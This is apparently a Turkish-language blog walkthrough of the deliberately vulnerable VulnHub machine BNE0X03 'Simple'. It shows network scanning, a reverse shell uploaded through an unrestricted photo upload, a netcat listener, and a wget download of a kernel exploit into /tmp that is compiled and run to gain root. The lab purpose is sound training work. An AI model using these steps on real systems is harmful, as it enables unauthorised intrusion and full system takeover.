Walkthrough

[TR] BNE0X03 -Simple Zafiyetli Makine Çözümü

Reklam

[TR] BNE0X03 -Simple Zafiyetli Makine Çözümü

 

Selamlar herkese, yeni başlayan dostlarımız için bir makine buldum. Bunun çözümünü sizinle paylaşmak istedim. Yeni başlayan dostlarımız için kolaydan zora makine çözümleri yapmayı planlıyorum. Dilerseniz makineyi VulnHub üzerinden yükleyip çözebilirsiniz.

İzleyeceğimiz adımlar;
Sistemi Tanıma,
Zaafiyeti bulma,
Sömürme ve yetki yükseltme olacaktır.

İlk adımımız Sistemi Tanıma
Sistemi Tanıma adımlarında şu adımları izleyebiliriz;
Ağ keşifi,port taraması, dizin keşfi.

Ağ keşifi yaparken Netdiscover aracını kullanıyoruz.

sudo netdiscover yazarak aracı kullanabiliriz.

Netdiscover

Yukarıda görüldüğü üzere  makineye ait ip adresi yer alıyor. (Eğer ki sizde görünmüyorsa,ağ ayarlarını kontrol edin.)

Netdiscover aracından bulduğumuz IP adresini “nmap” isimli port tarama aracında kullanacağız.

Nmap Taraması

nmap -sS -sV  ip_adresi yazarak nmap’i kullanıyoruz.

80 Portu açık. Yani bir web servisi ayakta.siteyi ziyaret ettiğimizde

login ve register olduğunu görüyoruz .Hesap açıp panele giriş yaptığımızda ise:

Kullanıcı paneli

şekilde bir görüntü ile karşlaşıyoruz.

2.adım: Sömürme


Paneldeki fonksiyonlar basit. O sebepten çok fazla atak vektörü yok. Kullanıcıların profil fotoğrafı yükleyebildiği bir yer var.Bu fonksiyonda “Unrestricted  File Upload” zaafiyeti var. Yani fotoğraf yüklememiz gerekiyorken biz oraya reverse shell yükleyeceğiz.

Reverse Shell

Kullandığımız reverse shelle buradan erişebilirsiniz. Evet şu anda reverse shellimiz başarıyla siteye yüklendi. Şimdi ise terminale gidip nc -lvp reverse_shelle_eklediğiniz_port_numarası yazmamız gerekmektedir. Bu sayede artık saldırgan portu dinlemeye almış olacak. Sağ tık “resmi yeni sayfada aç” diyerek yeni sekmede shellimizi açıyoruz.

Reverse Shell’e bağlanma

şimdi ise python -c ‘import pty; pty.spawn(“/bin/bash”)’ yazarak TTY shell’imize geçiyoruz

TTY shell

3. adım: Yetki Yükseltme

sürüm bilgisi

uname -a yazarak sistemin versiyon bilgilerine eriştik. Google’da bu sürümün (Privilege Escalation) yetki yükseltme exploitini arıyoruz.(buradan bulabilirsiniz)

exploit yükleme & derleme

Daha sonra ise tmp dizinine geçiyoruz.wget “https://www.exploit-db.com/exploits/37292” komutu ile exploitimizi yüklüyoruz. Yüklenen dosya ismini mv 37292 37292.c olarak değiştiriyoruz, ardından gcc ile kodumuzu derliyoruz.
gcc 37292.c 37292 yazarak kodumuzun derlenmiş halini 37292 olarak kaydediyoruz.şimdi ise ./37292 yazdığımız zaman root yetkilerine erişmiş olacağız.

root

Elimden geldiğince net anlatmaya çalıştım. Umarım anlaşılır olabilmişimdir. Herhangi bir sorunuz olursa twitter.com/pwnlabme adresinden ulaşabilirsiniz.

Reklam
Reklam

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu